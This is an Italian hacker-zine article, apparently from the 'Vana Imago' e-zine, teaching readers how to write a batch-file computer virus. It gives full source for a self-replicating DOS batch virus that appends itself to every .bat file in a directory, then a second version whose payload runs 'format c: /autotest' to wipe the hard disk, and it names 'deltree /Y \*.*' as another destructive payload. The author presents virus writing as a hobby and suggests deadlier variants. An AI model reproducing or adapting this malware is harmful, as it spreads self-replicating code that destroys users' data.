Copy Link
Add to Bookmark
Report
Vana Imago 2 34
____ _______ | _ | |__ __|____ _ _ | / /---\ | | / ___| | | | | | \ | _ | | | | / | |__| | | |) | | _ | | | | \___ | __ | |___/ |_| |_| |_| \___/ |_| |_| __ \\ // || | _\ || || \\// || | / || || \/ || ||\\ || || di Techno Knight Uh leggendo qua e la' mi sembrato che ultimamente va molto di moda scrivere virii in linguaggi non convenzionali, come il Visual Basic for Application oppure virus batch. Beh per prima cosa mi sento in dovere di dirvi che (almeno secondo il mio parere) scrivere macro virus o virus batch pu servire a divertirsi un p, ma per scrivere un virus serio o vi imparate l'asm o non entrerete mai nel meraviglioso mondo del virus writing ;) Cmq questa precisazione la dovevo fare per non sembrare lamer, ci tengo a precisare che io principalmente i virus li scrivo in asm, solo che mi sembrato divertente provare a fare qualcosa con il batch, quindi ho scritto velocemente questa guida. Ecco un semplice virus batch : @echo off ctty nul if %1==infetta goto infetta :cerca for %%a in (*.bat) do call %0.bat infetta %%a goto fine :infetta find ":cerca" %2 > nul if errorlevel 1 goto infettasi goto fine :infettasi type %0 >> %2 :fine ctty con Comincia a cercare tutti gli altri .bat della directory, quando ne trova uno richiama se stesso con il parametro "infetta" che dice al virus di non fare la ricerca (perch gi
stata fatta) ma di infettare il file gi
trovato (passato come secondo parametro). Ad ogni file .bat presente nella directory verranno aggiunte alla fine le righe del nostro virus, quindi ogni bat si eseguir
normalmente ma alla fine eseguir
anche il virus. Un virus batch + letale si potrebbe fare chiamando un piccolo eseguibile. Se ad esempio il file batch deve infettare un dischetto sul quale non presente il file eseguibile lo copier
sul dischetto, e ovviamente se viene eseguito da dischetto e deve infettare un hard disk sul quale non presente il file eseguibile, allora lo copier
sull'hd, se invece si accorge che gi
presente sul disco che deve infettare allora user
sempre quello. Per il payload possiamo usare le solite righe deltree /Y \*.* oppure format c: /autotest. Esempio : @echo off ctty nul if %1==infetta goto infetta :cerca for %%a in (*.bat) do call %0.bat infetta %%a goto fine :infetta find ":cerca" %2 > nul if errorlevel 1 goto infettasi goto fine :infettasi type %0 >> %2 :fine if %2a==a goto verafine format c: /autotest :verafine ctty con In questo caso se avremo la [s]fortuna di chiamare un batch infetto passandogli almeno 2 parametri allora si attiver
il payload che formatter
l'hard disk. Ovviamente le possibilit
sono tante e potete usare molti altri eventi per attivare la vostra bomba. Techno Knight (techno83@freemail.it) 
